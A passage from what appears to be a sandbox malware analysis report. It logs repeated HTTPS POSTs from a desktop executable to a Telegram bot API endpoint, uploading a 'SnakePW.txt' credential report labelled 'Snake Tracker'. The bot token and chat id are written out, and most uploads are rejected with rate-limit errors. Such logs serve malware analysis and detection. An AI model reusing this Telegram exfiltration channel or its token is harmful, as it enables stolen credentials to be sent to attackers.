2024-09-27 10:52:58 UTC	111	IN	Data Raw: 7b 22 6f 6b 22 3a 66 61 6c 73 65 2c 22 65 72 72 6f 72 5f 63 6f 64 65 22 3a 34 32 39 2c 22 64 65 73 63 72 69 70 74 69 6f 6e 22 3a 22 54 6f 6f 20 4d 61 6e 79 20 52 65 71 75 65 73 74 73 3a 20 72 65 74 72 79 20 61 66 74 65 72 20 32 32 22 2c 22 70 61 72 61 6d 65 74 65 72 73 22 3a 7b 22 72 65 74 72 79 5f 61 66 74 65 72 22 3a 32 32 7d 7d Data Ascii: {"ok":false,"error_code":429,"description":"Too Many Requests: retry after 22","parameters":{"retry_after":22}}

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
30	192.168.2.7	49746	149.154.167.220	443	1424	C:\Users\user\Desktop\.05.2024.exe

Timestamp	Bytes transferred	Direction	Data
2024-09-27 10:52:59 UTC	335	OUT	POST /bot6783395654:AAGHZk1wugh441q673h1nDNWiVYW4p6ewXc/sendDocument?chat_id=-4209622687&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1 Content-Type: multipart/form-data; boundary=------------------------8dce0bbfd2778c2 Host: api.telegram.org Content-Length: 551
2024-09-27 10:52:59 UTC	551	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 63 65 30 62 62 66 64 32 37 37 38 63 32 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 66 72 6f 6e 74 64 65 73 6b 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 32 31 36 38 36 35 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 32 37 2f 30 39 2f 32 30 32 34 20 2f 20 30 36 3a 35 32 3a 30 36 0d 0a 43 6c 69 65 6e 74 20 Data Ascii: --------------------------8dce0bbfd2778c2Content-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW \| user \| Snake PC Name:216865Date and Time: 27/09/2024 / 06:52:06Client
2024-09-27 10:52:59 UTC	370	IN	HTTP/1.1 429 Too Many Requests Server: nginx/1.18.0 Date: Fri, 27 Sep 2024 10:52:59 GMT Content-Type: application/json Content-Length: 111 Connection: close Retry-After: 21 Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2024-09-27 10:52:59 UTC	111	IN	Data Raw: 7b 22 6f 6b 22 3a 66 61 6c 73 65 2c 22 65 72 72 6f 72 5f 63 6f 64 65 22 3a 34 32 39 2c 22 64 65 73 63 72 69 70 74 69 6f 6e 22 3a 22 54 6f 6f 20 4d 61 6e 79 20 52 65 71 75 65 73 74 73 3a 20 72 65 74 72 79 20 61 66 74 65 72 20 32 31 22 2c 22 70 61 72 61 6d 65 74 65 72 73 22 3a 7b 22 72 65 74 72 79 5f 61 66 74 65 72 22 3a 32 31 7d 7d Data Ascii: {"ok":false,"error_code":429,"description":"Too Many Requests: retry after 21","parameters":{"retry_after":21}}

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
31	192.168.2.7	49747	149.154.167.220	443	1424	C:\Users\user\Desktop\.05.2024.exe

Timestamp	Bytes transferred	Direction	Data
2024-09-27 10:53:00 UTC	359	OUT	POST /bot6783395654:AAGHZk1wugh441q673h1nDNWiVYW4p6ewXc/sendDocument?chat_id=-4209622687&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1 Content-Type: multipart/form-data; boundary=------------------------8dce0ca1fdaebe8 Host: api.telegram.org Content-Length: 551 Connection: Keep-Alive
2024-09-27 10:53:00 UTC	551	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 63 65 30 63 61 31 66 64 61 65 62 65 38 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 66 72 6f 6e 74 64 65 73 6b 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 32 31 36 38 36 35 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 32 37 2f 30 39 2f 32 30 32 34 20 2f 20 30 36 3a 35 32 3a 30 36 0d 0a 43 6c 69 65 6e 74 20 Data Ascii: --------------------------8dce0ca1fdaebe8Content-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW \| user \| Snake PC Name:216865Date and Time: 27/09/2024 / 06:52:06Client
2024-09-27 10:53:00 UTC	370	IN	HTTP/1.1 429 Too Many Requests Server: nginx/1.18.0 Date: Fri, 27 Sep 2024 10:53:00 GMT Content-Type: application/json Content-Length: 111 Connection: close Retry-After: 20 Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2024-09-27 10:53:00 UTC	111	IN	Data Raw: 7b 22 6f 6b 22 3a 66 61 6c 73 65 2c 22 65 72 72 6f 72 5f 63 6f 64 65 22 3a 34 32 39 2c 22 64 65 73 63 72 69 70 74 69 6f 6e 22 3a 22 54 6f 6f 20 4d 61 6e 79 20 52 65 71 75 65 73 74 73 3a 20 72 65 74 72 79 20 61 66 74 65 72 20 32 30 22 2c 22 70 61 72 61 6d 65 74 65 72 73 22 3a 7b 22 72 65 74 72 79 5f 61 66 74 65 72 22 3a 32 30 7d 7d Data Ascii: {"ok":false,"error_code":429,"description":"Too Many Requests: retry after 20","parameters":{"retry_after":20}}

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
32	192.168.2.7	49748	149.154.167.220	443	1424	C:\Users\user\Desktop\.05.2024.exe

Timestamp	Bytes transferred	Direction	Data
2024-09-27 10:53:01 UTC	335	OUT	POST /bot6783395654:AAGHZk1wugh441q673h1nDNWiVYW4p6ewXc/sendDocument?chat_id=-4209622687&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1 Content-Type: multipart/form-data; boundary=------------------------8dce0dc1483271d Host: api.telegram.org Content-Length: 551
2024-09-27 10:53:01 UTC	551	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 63 65 30 64 63 31 34 38 33 32 37 31 64 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 66 72 6f 6e 74 64 65 73 6b 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 32 31 36 38 36 35 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 32 37 2f 30 39 2f 32 30 32 34 20 2f 20 30 36 3a 35 32 3a 30 36 0d 0a 43 6c 69 65 6e 74 20 Data Ascii: --------------------------8dce0dc1483271dContent-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW \| user \| Snake PC Name:216865Date and Time: 27/09/2024 / 06:52:06Client
2024-09-27 10:53:02 UTC	370	IN	HTTP/1.1 429 Too Many Requests Server: nginx/1.18.0 Date: Fri, 27 Sep 2024 10:53:01 GMT Content-Type: application/json Content-Length: 111 Connection: close Retry-After: 19 Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2024-09-27 10:53:02 UTC	111	IN	Data Raw: 7b 22 6f 6b 22 3a 66 61 6c 73 65 2c 22 65 72 72 6f 72 5f 63 6f 64 65 22 3a 34 32 39 2c 22 64 65 73 63 72 69 70 74 69 6f 6e 22 3a 22 54 6f 6f 20 4d 61 6e 79 20 52 65 71 75 65 73 74 73 3a 20 72 65 74 72 79 20 61 66 74 65 72 20 31 39 22 2c 22 70 61 72 61 6d 65 74 65 72 73 22 3a 7b 22 72 65 74 72 79 5f 61 66 74 65 72 22 3a 31 39 7d 7d Data Ascii: {"ok":false,"error_code":429,"description":"Too Many Requests: retry after 19","parameters":{"retry_after":19}}

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
33	192.168.2.7	49750	149.154.167.220	443	1424	C:\Users\user\Desktop\.05.2024.exe

Timestamp	Bytes transferred	Direction	Data
2024-09-27 10:53:03 UTC	359	OUT	POST /bot6783395654:AAGHZk1wugh441q673h1nDNWiVYW4p6ewXc/sendDocument?chat_id=-4209622687&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1 Content-Type: multipart/form-data; boundary=------------------------8dce0f97f541458 Host: api.telegram.org Content-Length: 551 Connection: Keep-Alive
2024-09-27 10:53:03 UTC	551	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 63 65 30 66 39 37 66 35 34 31 34 35 38 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 66 72 6f 6e 74 64 65 73 6b 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 32 31 36 38 36 35 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 32 37 2f 30 39 2f 32 30 32 34 20 2f 20 30 36 3a 35 32 3a 30 36 0d 0a 43 6c 69 65 6e 74 20 Data Ascii: --------------------------8dce0f97f541458Content-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW \| user \| Snake PC Name:216865Date and Time: 27/09/2024 / 06:52:06Client
2024-09-27 10:53:03 UTC	370	IN	HTTP/1.1 429 Too Many Requests Server: nginx/1.18.0 Date: Fri, 27 Sep 2024 10:53:03 GMT Content-Type: application/json Content-Length: 111 Connection: close Retry-After: 17 Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2024-09-27 10:53:03 UTC	111	IN	Data Raw: 7b 22 6f 6b 22 3a 66 61 6c 73 65 2c 22 65 72 72 6f 72 5f 63 6f 64 65 22 3a 34 32 39 2c 22 64 65 73 63 72 69 70 74 69 6f 6e 22 3a 22 54 6f 6f 20 4d 61 6e 79 20 52 65 71 75 65 73 74 73 3a 20 72 65 74 72 79 20 61 66 74 65 72 20 31 37 22 2c 22 70 61 72 61 6d 65 74 65 72 73 22 3a 7b 22 72 65 74 72 79 5f 61 66 74 65 72 22 3a 31 37 7d 7d Data Ascii: {"ok":false,"error_code":429,"description":"Too Many Requests: retry after 17","parameters":{"retry_after":17}}

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
34	192.168.2.7	49751	149.154.167.220	443	1424	C:\Users\user\Desktop\.05.2024.exe

Timestamp	Bytes transferred	Direction	Data
2024-09-27 10:53:05 UTC	335	OUT	POST /bot6783395654:AAGHZk1wugh441q673h1nDNWiVYW4p6ewXc/sendDocument?chat_id=-4209622687&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1 Content-Type: multipart/form-data; boundary=------------------------8dce10b5aae0611 Host: api.telegram.org Content-Length: 551
2024-09-27 10:53:05 UTC	551	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 63 65 31 30 62 35 61 61 65 30 36 31 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 66 72 6f 6e 74 64 65 73 6b 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 32 31 36 38 36 35 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 32 37 2f 30 39 2f 32 30 32 34 20 2f 20 30 36 3a 35 32 3a 30 36 0d 0a 43 6c 69 65 6e 74 20 Data Ascii: --------------------------8dce10b5aae0611Content-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW \| user \| Snake PC Name:216865Date and Time: 27/09/2024 / 06:52:06Client
2024-09-27 10:53:05 UTC	370	IN	HTTP/1.1 429 Too Many Requests Server: nginx/1.18.0 Date: Fri, 27 Sep 2024 10:53:05 GMT Content-Type: application/json Content-Length: 111 Connection: close Retry-After: 15 Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2024-09-27 10:53:05 UTC	111	IN	Data Raw: 7b 22 6f 6b 22 3a 66 61 6c 73 65 2c 22 65 72 72 6f 72 5f 63 6f 64 65 22 3a 34 32 39 2c 22 64 65 73 63 72 69 70 74 69 6f 6e 22 3a 22 54 6f 6f 20 4d 61 6e 79 20 52 65 71 75 65 73 74 73 3a 20 72 65 74 72 79 20 61 66 74 65 72 20 31 35 22 2c 22 70 61 72 61 6d 65 74 65 72 73 22 3a 7b 22 72 65 74 72 79 5f 61 66 74 65 72 22 3a 31 35 7d 7d Data Ascii: {"ok":false,"error_code":429,"description":"Too Many Requests: retry after 15","parameters":{"retry_after":15}}

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
35	192.168.2.7	49752	149.154.167.220	443	1424	C:\Users\user\Desktop\.05.2024.exe

Timestamp	Bytes transferred	Direction	Data
2024-09-27 10:53:06 UTC	359	OUT	POST /bot6783395654:AAGHZk1wugh441q673h1nDNWiVYW4p6ewXc/sendDocument?chat_id=-4209622687&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1 Content-Type: multipart/form-data; boundary=------------------------8dce13183a9347e Host: api.telegram.org Content-Length: 551 Connection: Keep-Alive
2024-09-27 10:53:06 UTC	551	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 63 65 31 33 31 38 33 61 39 33 34 37 65 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 66 72 6f 6e 74 64 65 73 6b 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 32 31 36 38 36 35 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 32 37 2f 30 39 2f 32 30 32 34 20 2f 20 30 36 3a 35 32 3a 30 36 0d 0a 43 6c 69 65 6e 74 20 Data Ascii: --------------------------8dce13183a9347eContent-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW \| user \| Snake PC Name:216865Date and Time: 27/09/2024 / 06:52:06Client
2024-09-27 10:53:06 UTC	370	IN	HTTP/1.1 429 Too Many Requests Server: nginx/1.18.0 Date: Fri, 27 Sep 2024 10:53:06 GMT Content-Type: application/json Content-Length: 111 Connection: close Retry-After: 14 Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2024-09-27 10:53:06 UTC	111	IN	Data Raw: 7b 22 6f 6b 22 3a 66 61 6c 73 65 2c 22 65 72 72 6f 72 5f 63 6f 64 65 22 3a 34 32 39 2c 22 64 65 73 63 72 69 70 74 69 6f 6e 22 3a 22 54 6f 6f 20 4d 61 6e 79 20 52 65 71 75 65 73 74 73 3a 20 72 65 74 72 79 20 61 66 74 65 72 20 31 34 22 2c 22 70 61 72 61 6d 65 74 65 72 73 22 3a 7b 22 72 65 74 72 79 5f 61 66 74 65 72 22 3a 31 34 7d 7d Data Ascii: {"ok":false,"error_code":429,"description":"Too Many Requests: retry after 14","parameters":{"retry_after":14}}

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
36	192.168.2.7	49753	149.154.167.220	443	1424	C:\Users\user\Desktop\.05.2024.exe

Timestamp	Bytes transferred	Direction	Data
2024-09-27 10:53:07 UTC	335	OUT	POST /bot6783395654:AAGHZk1wugh441q673h1nDNWiVYW4p6ewXc/sendDocument?chat_id=-4209622687&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1 Content-Type: multipart/form-data; boundary=------------------------8dce145cf287277 Host: api.telegram.org Content-Length: 551
2024-09-27 10:53:07 UTC	551	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 63 65 31 34 35 63 66 32 38 37 32 37 37 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 66 72 6f 6e 74 64 65 73 6b 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 32 31 36 38 36 35 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 32 37 2f 30 39 2f 32 30 32 34 20 2f 20 30 36 3a 35 32 3a 30 36 0d 0a 43 6c 69 65 6e 74 20 Data Ascii: --------------------------8dce145cf287277Content-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW \| user \| Snake PC Name:216865Date and Time: 27/09/2024 / 06:52:06Client
2024-09-27 10:53:08 UTC	370	IN	HTTP/1.1 429 Too Many Requests Server: nginx/1.18.0 Date: Fri, 27 Sep 2024 10:53:07 GMT Content-Type: application/json Content-Length: 111 Connection: close Retry-After: 13 Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2024-09-27 10:53:08 UTC	111	IN	Data Raw: 7b 22 6f 6b 22 3a 66 61 6c 73 65 2c 22 65 72 72 6f 72 5f 63 6f 64 65 22 3a 34 32 39 2c 22 64 65 73 63 72 69 70 74 69 6f 6e 22 3a 22 54 6f 6f 20 4d 61 6e 79 20 52 65 71 75 65 73 74 73 3a 20 72 65 74 72 79 20 61 66 74 65 72 20 31 33 22 2c 22 70 61 72 61 6d 65 74 65 72 73 22 3a 7b 22 72 65 74 72 79 5f 61 66 74 65 72 22 3a 31 33 7d 7d Data Ascii: {"ok":false,"error_code":429,"description":"Too Many Requests: retry after 13","parameters":{"retry_after":13}}

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
37	192.168.2.7	49754	149.154.167.220	443	1424	C:\Users\user\Desktop\.05.2024.exe

Timestamp	Bytes transferred	Direction	Data
2024-09-27 10:53:08 UTC	359	OUT	POST /bot6783395654:AAGHZk1wugh441q673h1nDNWiVYW4p6ewXc/sendDocument?chat_id=-4209622687&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1 Content-Type: multipart/form-data; boundary=------------------------8dce15f1cd8d4a6 Host: api.telegram.org Content-Length: 551 Connection: Keep-Alive
2024-09-27 10:53:08 UTC	551	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 63 65 31 35 66 31 63 64 38 64 34 61 36 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 66 72 6f 6e 74 64 65 73 6b 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 32 31 36 38 36 35 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 32 37 2f 30 39 2f 32 30 32 34 20 2f 20 30 36 3a 35 32 3a 30 36 0d 0a 43 6c 69 65 6e 74 20 Data Ascii: --------------------------8dce15f1cd8d4a6Content-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW \| user \| Snake PC Name:216865Date and Time: 27/09/2024 / 06:52:06Client
2024-09-27 10:53:09 UTC	370	IN	HTTP/1.1 429 Too Many Requests Server: nginx/1.18.0 Date: Fri, 27 Sep 2024 10:53:09 GMT Content-Type: application/json Content-Length: 111 Connection: close Retry-After: 11 Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2024-09-27 10:53:09 UTC	111	IN	Data Raw: 7b 22 6f 6b 22 3a 66 61 6c 73 65 2c 22 65 72 72 6f 72 5f 63 6f 64 65 22 3a 34 32 39 2c 22 64 65 73 63 72 69 70 74 69 6f 6e 22 3a 22 54 6f 6f 20 4d 61 6e 79 20 52 65 71 75 65 73 74 73 3a 20 72 65 74 72 79 20 61 66 74 65 72 20 31 31 22 2c 22 70 61 72 61 6d 65 74 65 72 73 22 3a 7b 22 72 65 74 72 79 5f 61 66 74 65 72 22 3a 31 31 7d 7d Data Ascii: {"ok":false,"error_code":429,"description":"Too Many Requests: retry after 11","parameters":{"retry_after":11}}

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
38	192.168.2.7	49755	149.154.167.220	443	1424	C:\Users\user\Desktop\.05.2024.exe

Timestamp	Bytes transferred	Direction	Data
2024-09-27 10:53:09 UTC	335	OUT	POST /bot6783395654:AAGHZk1wugh441q673h1nDNWiVYW4p6ewXc/sendDocument?chat_id=-4209622687&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1 Content-Type: multipart/form-data; boundary=------------------------8dce17718e41189 Host: api.telegram.org Content-Length: 551
2024-09-27 10:53:09 UTC	551	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 63 65 31 37 37 31 38 65 34 31 31 38 39 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 66 72 6f 6e 74 64 65 73 6b 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 32 31 36 38 36 35 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 32 37 2f 30 39 2f 32 30 32 34 20 2f 20 30 36 3a 35 32 3a 30 36 0d 0a 43 6c 69 65 6e 74 20 Data Ascii: --------------------------8dce17718e41189Content-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW \| user \| Snake PC Name:216865Date and Time: 27/09/2024 / 06:52:06Client
2024-09-27 10:53:10 UTC	370	IN	HTTP/1.1 429 Too Many Requests Server: nginx/1.18.0 Date: Fri, 27 Sep 2024 10:53:10 GMT Content-Type: application/json Content-Length: 111 Connection: close Retry-After: 10 Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2024-09-27 10:53:10 UTC	111	IN	Data Raw: 7b 22 6f 6b 22 3a 66 61 6c 73 65 2c 22 65 72 72 6f 72 5f 63 6f 64 65 22 3a 34 32 39 2c 22 64 65 73 63 72 69 70 74 69 6f 6e 22 3a 22 54 6f 6f 20 4d 61 6e 79 20 52 65 71 75 65 73 74 73 3a 20 72 65 74 72 79 20 61 66 74 65 72 20 31 30 22 2c 22 70 61 72 61 6d 65 74 65 72 73 22 3a 7b 22 72 65 74 72 79 5f 61 66 74 65 72 22 3a 31 30 7d 7d Data Ascii: {"ok":false,"error_code":429,"description":"Too Many Requests: retry after 10","parameters":{"retry_after":10}}

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
39	192.168.2.7	49756	149.154.167.220	443	1424	C:\Users\user\Desktop\.05.2024.exe

Timestamp	Bytes transferred	Direction	Data
2024-09-27 10:53:10 UTC	359	OUT	POST /bot6783395654:AAGHZk1wugh441q673h1nDNWiVYW4p6ewXc/sendDocument?chat_id=-4209622687&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1 Content-Type: multipart/form-data; boundary=------------------------8dce1919006e200 Host: api.telegram.org Content-Length: 551 Connection: Keep-Alive
